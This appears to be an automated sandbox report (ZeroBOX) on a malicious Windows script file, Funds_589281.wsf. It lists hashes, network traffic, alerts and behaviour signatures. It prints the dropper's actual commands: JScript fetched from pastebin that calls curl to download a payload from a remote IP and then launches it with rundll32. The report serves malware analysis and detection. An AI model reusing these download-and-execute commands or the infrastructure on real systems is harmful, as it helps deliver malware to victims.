Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6402	April 19, 2023, 8:59 a.m.	April 19, 2023, 9:01 a.m.

Size	77.6KB
Type	UTF-8 Unicode text, with very long lines, with CRLF, LF line terminators
MD5	`3d90344c5976a644b6e482e9a325d9cb`
SHA256	`b500b400ad724bf0a5415d5bbc53e77f2a06cbdebe3210654f10e2c52006667a`
CRC32	`C3D098C9`
ssdeep	`1536:gjVCfQtg3YiaC8m4TijEDgK+xalolRrZs8dvgfTGK0rbf3DbXrX:gjcE2xMm4UEd4V++vgfTT0rbbbXb`
Yara	None matched

wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\Funds_589281.wsf
3028
- curl.exe "C:\util\curl\curl.exe" --output c:\programdata\index.html --url http://216.120.201.169/aSxBaqnfj98wz.dat
  2260
- rundll32.exe "C:\Windows\System32\rundll32.exe" c:\programdata\index.html,Motd
  2436

Name	Response	Post-Analysis Lookup
pastebin.com	A 172.67.34.170 A 104.20.67.143 A 104.20.68.143	104.20.68.143

IP Address	Status	Action
164.124.101.2	Active	Moloch
172.67.34.170	Active	Moloch
216.120.201.169	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.102:49161 -> 172.67.34.170:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined

Suricata TLS

Flow	Issuer	Subject	Fingerprint
TLSv1 192.168.56.102:49161 172.67.34.170:443	C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2	C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com	79:b7:9c:ec:8a:be:ea:82:0d:16:04:fb:46:5f:89:6b:78:b9:43:fd

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx April 19, 2023, 8:59 a.m.		1	1	0

One or more processes crashed (1 event)

Time & API	Arguments	Status	Return	Repeated
__exception__ April 19, 2023, 8:59 a.m.	stacktrace: CtfImeIsIME+0x36fd DllUnregisterServer-0xf9d9 msctf+0x2d08c @ 0x75d2d08c TF_GetGlobalCompartment+0x3dfd CtfImeIsIME-0x344 msctf+0x2964b @ 0x75d2964b TF_GetInputScope+0xf65 CtfImeDestroyThreadMgr-0x25ae msctf+0x14d6b @ 0x75d14d6b TF_GetInputScope+0x3176 CtfImeDestroyThreadMgr-0x39d msctf+0x16f7c @ 0x75d16f7c CtfImeDestroyInputContext+0x280 TF_CanUninitialize-0x1c msctf+0x1e825 @ 0x75d1e825 TF_GetInputScope+0x21fc CtfImeDestroyThreadMgr-0x1317 msctf+0x16002 @ 0x75d16002 TF_GetInputScope+0x21e2 CtfImeDestroyThreadMgr-0x1331 msctf+0x15fe8 @ 0x75d15fe8 TF_GetInputScope+0xbdd CtfImeDestroyThreadMgr-0x2936 msctf+0x149e3 @ 0x75d149e3 TF_GetInputScope+0x1c1a CtfImeDestroyThreadMgr-0x18f9 msctf+0x15a20 @ 0x75d15a20 RtlIsCurrentThreadAttachExempt+0x5f TpCheckTerminateWorker-0x37 ntdll+0x39a91 @ 0x774a9a91 LdrShutdownProcess+0x97 RtlDetectHeapLeaks-0x1bb ntdll+0x58f10 @ 0x774c8f10 RtlExitUserProcess+0x74 LdrShutdownProcess-0x1d ntdll+0x58e5c @ 0x774c8e5c ExitProcess+0x15 TerminateThread-0xa kernel32+0x17a25 @ 0x74e87a25 rundll32+0x135c @ 0x95135c rundll32+0x1901 @ 0x951901 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x74e833ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x774a9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x774a9ea5 exception.instruction_r: ff 51 0c 8b 45 fc 89 be 8c 04 00 00 3b c7 74 25 exception.symbol: TF_GetCompatibleKeyboardLayout+0x5885 TF_IsCtfmonRunning-0xfd3 msctf+0x43ef4 exception.instruction: call dword ptr [ecx + 0xc] exception.module: MSCTF.dll exception.exception_code: 0xc0000005 exception.offset: 278260 exception.address: 0x75d43ef4 registers.esp: 1963208 registers.edi: 0 registers.eax: 9106040 registers.ebp: 1963236 registers.edx: 1 registers.ebx: 0 registers.esi: 6821408 registers.ecx: 1945319124	1	0	0

Time & API

Arguments

Status

Return

Repeated

__exception__

April 19, 2023, 8:59 a.m.

stacktrace:

CtfImeIsIME+0x36fd DllUnregisterServer-0xf9d9 msctf+0x2d08c @ 0x75d2d08c
TF_GetGlobalCompartment+0x3dfd CtfImeIsIME-0x344 msctf+0x2964b @ 0x75d2964b
TF_GetInputScope+0xf65 CtfImeDestroyThreadMgr-0x25ae msctf+0x14d6b @ 0x75d14d6b
TF_GetInputScope+0x3176 CtfImeDestroyThreadMgr-0x39d msctf+0x16f7c @ 0x75d16f7c
CtfImeDestroyInputContext+0x280 TF_CanUninitialize-0x1c msctf+0x1e825 @ 0x75d1e825
TF_GetInputScope+0x21fc CtfImeDestroyThreadMgr-0x1317 msctf+0x16002 @ 0x75d16002
TF_GetInputScope+0x21e2 CtfImeDestroyThreadMgr-0x1331 msctf+0x15fe8 @ 0x75d15fe8
TF_GetInputScope+0xbdd CtfImeDestroyThreadMgr-0x2936 msctf+0x149e3 @ 0x75d149e3
TF_GetInputScope+0x1c1a CtfImeDestroyThreadMgr-0x18f9 msctf+0x15a20 @ 0x75d15a20
RtlIsCurrentThreadAttachExempt+0x5f TpCheckTerminateWorker-0x37 ntdll+0x39a91 @ 0x774a9a91
LdrShutdownProcess+0x97 RtlDetectHeapLeaks-0x1bb ntdll+0x58f10 @ 0x774c8f10
RtlExitUserProcess+0x74 LdrShutdownProcess-0x1d ntdll+0x58e5c @ 0x774c8e5c
ExitProcess+0x15 TerminateThread-0xa kernel32+0x17a25 @ 0x74e87a25
rundll32+0x135c @ 0x95135c
rundll32+0x1901 @ 0x951901
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x74e833ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x774a9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x774a9ea5

exception.instruction_r: ff 51 0c 8b 45 fc 89 be 8c 04 00 00 3b c7 74 25
exception.symbol: TF_GetCompatibleKeyboardLayout+0x5885 TF_IsCtfmonRunning-0xfd3 msctf+0x43ef4
exception.instruction: call dword ptr [ecx + 0xc]
exception.module: MSCTF.dll
exception.exception_code: 0xc0000005
exception.offset: 278260
exception.address: 0x75d43ef4
registers.esp: 1963208
registers.edi: 0
registers.eax: 9106040
registers.ebp: 1963236
registers.edx: 1
registers.ebx: 0
registers.esi: 6821408
registers.ecx: 1945319124

Performs some HTTP requests (2 events)

request	GET https://pastebin.com/raw/zD5ag0UX
request	GET https://pastebin.com/raw/mJfkXNYx

Allocates read-write-execute memory (usually to unpack itself) (2 events)

Time & API	Arguments	Status	Return	Repeated
NtProtectVirtualMemory April 19, 2023, 8:59 a.m.	process_identifier: 2436 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73ed1000 process_handle: 0xffffffff	1	0	0
NtProtectVirtualMemory April 19, 2023, 8:59 a.m.	process_identifier: 2436 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73ed3000 process_handle: 0xffffffff	1	0	0

Communicates with host for which no DNS query was performed (1 event)

host

216.120.201.169

Wscript.exe initiated network communications indicative of a script based payload download (8 events)

Time & API	Arguments	Status	Return
InternetCrackUrlW April 19, 2023, 8:59 a.m.	url: https://pastebin.com/raw/zD5ag0UX flags: 0	1	1
HttpOpenRequestW April 19, 2023, 8:59 a.m.	connect_handle: 0x00cc0008 http_version: flags: 12582912 http_method: GET referer: path: /raw/zD5ag0UX	1	13369356
InternetCrackUrlA April 19, 2023, 8:59 a.m.	url: https://pastebin.com/raw/zD5ag0UX flags: 0	1	1
InternetReadFile April 19, 2023, 8:59 a.m.	buffer: new ActiveXObject('wscript.shell').run('curl.exe --output c:\\programdata\\index.html --url ' + url, 6); request_handle: 0x00cc000c	1	1
InternetCrackUrlW April 19, 2023, 8:59 a.m.	url: https://pastebin.com/raw/mJfkXNYx flags: 0	1	1
HttpOpenRequestW April 19, 2023, 8:59 a.m.	connect_handle: 0x00cc0008 http_version: flags: 12582912 http_method: GET referer: path: /raw/mJfkXNYx	1	13369356
InternetCrackUrlA April 19, 2023, 8:59 a.m.	url: https://pastebin.com/raw/mJfkXNYx flags: 0	1	1
InternetReadFile April 19, 2023, 8:59 a.m.	buffer: new ActiveXObject('wscript.shell').run('rundll32 c:\\programdata\\index.html,Motd'); request_handle: 0x00cc000c	1	1

wscript.exe-based dropper (JScript, VBS) (2 events)

Network communications indicative of a potential document or script payload download was initiated by the process wscript.exe (15 events)

Time & API	Arguments	Status	Return
InternetCrackUrlW April 19, 2023, 8:59 a.m.	url: https://pastebin.com/raw/zD5ag0UX flags: 0	1	1
HttpOpenRequestW April 19, 2023, 8:59 a.m.	connect_handle: 0x00cc0008 http_version: flags: 12582912 http_method: GET referer: path: /raw/zD5ag0UX	1	13369356
send April 19, 2023, 8:59 a.m.	buffer: ! socket: 852 sent: 1	1	1
send April 19, 2023, 8:59 a.m.	buffer: okd?.ÆNËÃZTpeçJöÃ>ÊjõîTg4Ò§Ã÷/5 ÀÀÀ À 28*ÿpastebin.com socket: 964 sent: 116	1	116
send April 19, 2023, 8:59 a.m.	buffer: ! socket: 852 sent: 1	1	1
send April 19, 2023, 8:59 a.m.	buffer: FBA÷Ê´ªTõà\|ùÂ½¸4JN8VÞîvÂ$=ÑaÕ²På"3ñràûEFSü×ÍÁ:qS¼¤0Ã_9¿C\|úfîÈø*¹m8ò½ËÔÇ¸"5úøÆ×27¸Ú socket: 964 sent: 134	1	134
send April 19, 2023, 8:59 a.m.	buffer: ! socket: 852 sent: 1	1	1
send April 19, 2023, 8:59 a.m.	buffer: `2ô68½>Ëjí·K÷Özî©ßg½:_r_`¤^Üü4ý×7ÊBcM,ó[ï²¹\|utüåoÐúö0~-.Lû;þÃeê®8k§-Ëùº¦iàÇ²Úyn`=H.gcÉØHil#NóÇÎMI¡ÌcZÏ¶ÃJË+>îS /#µç\ +g©»szvûL?Öi´àAÈ=ämj¸×õ^¬Z@J°¸H@íÄqåA!ëê·Q7=6é§cçËBH÷½ Ì}þÐø¬/ DÏ2·ãÜiø>Ì×¾oÜÄw;¬¯ÓCé¥UÑ2bQÅ3:Ð2Ëå_Î¶ûÎLfwUäG.¯Ï÷¸Îë@ë_]ªxâ¯÷M«?«¿ìãv2RMAa~ socket: 964 sent: 357	1	357
send April 19, 2023, 8:59 a.m.	buffer: ! socket: 852 sent: 1	1	1
InternetCrackUrlA April 19, 2023, 8:59 a.m.	url: https://pastebin.com/raw/zD5ag0UX flags: 0	1	1
InternetCrackUrlW April 19, 2023, 8:59 a.m.	url: https://pastebin.com/raw/mJfkXNYx flags: 0	1	1
HttpOpenRequestW April 19, 2023, 8:59 a.m.	connect_handle: 0x00cc0008 http_version: flags: 12582912 http_method: GET referer: path: /raw/mJfkXNYx	1	13369356
send April 19, 2023, 8:59 a.m.	buffer: `%b{Ä 5kéâ÷yÆO<¦ïØ[Ñ¤vaV: ÅR6)ù·¸õ{QH´6¤çú¬)ì8ßI/èÛôÝëð;9J£²ÞçÖ\£-0É4BrINdhä;±ò4?÷±MØ~¶LRÂ\ñÔ ¤\øF×]X·ÅBj±Écl^¿±#E=xFW±íÑQGÁù×U)gcCJDæ . àiC ¤'Gò%eæ§øÓ/Az l3izc±¿è]äÒ4?ÿg´b~Å6fqc÷º½ü½²KBw´¡ÿèV?àþÿß\|ô¢%×Å!.eÿ<¦ÞAZ¡àË¨Õ¡¨ôé=]£@b ÷6¼¥k÷r4®üîËhæÒâ&lÏÃK¶1zè@K72Ç socket: 964 sent: 357	1	357
send April 19, 2023, 8:59 a.m.	buffer: ! socket: 852 sent: 1	1	1
InternetCrackUrlA April 19, 2023, 8:59 a.m.	url: https://pastebin.com/raw/mJfkXNYx flags: 0	1	1

One or more non-whitelisted processes were created (4 events)

parent_process	wscript.exe	martian_process	rundll32 c:\programdata\index.html,Motd
parent_process	wscript.exe	martian_process	curl.exe --output c:\programdata\index.html --url http://216.120.201.169/aSxBaqnfj98wz.dat
parent_process	wscript.exe	martian_process	"C:\util\curl\curl.exe" --output c:\programdata\index.html --url http://216.120.201.169/aSxBaqnfj98wz.dat
parent_process	wscript.exe	martian_process	"C:\Windows\System32\rundll32.exe" c:\programdata\index.html,Motd

Connects to an IP address that is no longer responding to requests (legitimate services will remain up-and-running usually) (1 event)

dead_host

216.120.201.169:80

A potential heapspray has been detected. 3328 megabytes was sprayed onto the heap of the wscript.exe process (17 events)

count

2199

name

heapspray

process

wscript.exe

total_mb

197

length

94208

protection

PAGE_READWRITE

count

15414

name

heapspray

process

wscript.exe

total_mb

421

length

28672

protection

PAGE_READWRITE

count

24236

name

heapspray

process

wscript.exe

total_mb

284

length

12288

protection

PAGE_READWRITE

count

4410

name

heapspray

process

wscript.exe

total_mb

155

length

36864

protection

PAGE_READWRITE

count

2201

name

heapspray

process

wscript.exe

total_mb

180

length

86016

protection

PAGE_READWRITE

count

2198

name

heapspray

process

wscript.exe

total_mb

188

length

90112

protection

PAGE_READWRITE

count

6610

name

heapspray

process

wscript.exe

total_mb

length

8192

protection

PAGE_READWRITE

count

22033

name

heapspray

process

wscript.exe

total_mb

length

4096

protection

PAGE_READWRITE

count

4395

name

heapspray

process

wscript.exe

total_mb

223

length

53248

protection

PAGE_READWRITE

count

2200

name

heapspray

process

wscript.exe

total_mb

length

32768

protection

PAGE_READWRITE

count

6602

name

heapspray

process

wscript.exe

total_mb

489

length

77824

protection

PAGE_READWRITE

count

2200

name

heapspray

process

wscript.exe

total_mb

120

length

57344

protection

PAGE_READWRITE

count

6604

name

heapspray

process

wscript.exe

total_mb

103

length

16384

protection

PAGE_READWRITE

count

6622

name

heapspray

process

wscript.exe

total_mb

129

length

20480

protection

PAGE_READWRITE

count

6598

name

heapspray

process

wscript.exe

total_mb

283

length

45056

protection

PAGE_READWRITE

count

2198

name

heapspray

process

wscript.exe

total_mb

145

length

69632

protection

PAGE_READWRITE

count

4404

name

heapspray

process

wscript.exe

total_mb

206

length

49152

protection

PAGE_READWRITE

The process wscript.exe wrote an executable file to disk which it then attempted to execute (2 events)

file	C:\util\curl\curl.exe
file	C:\Windows\System32\rundll32.exe

Funds_589281.wsf

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All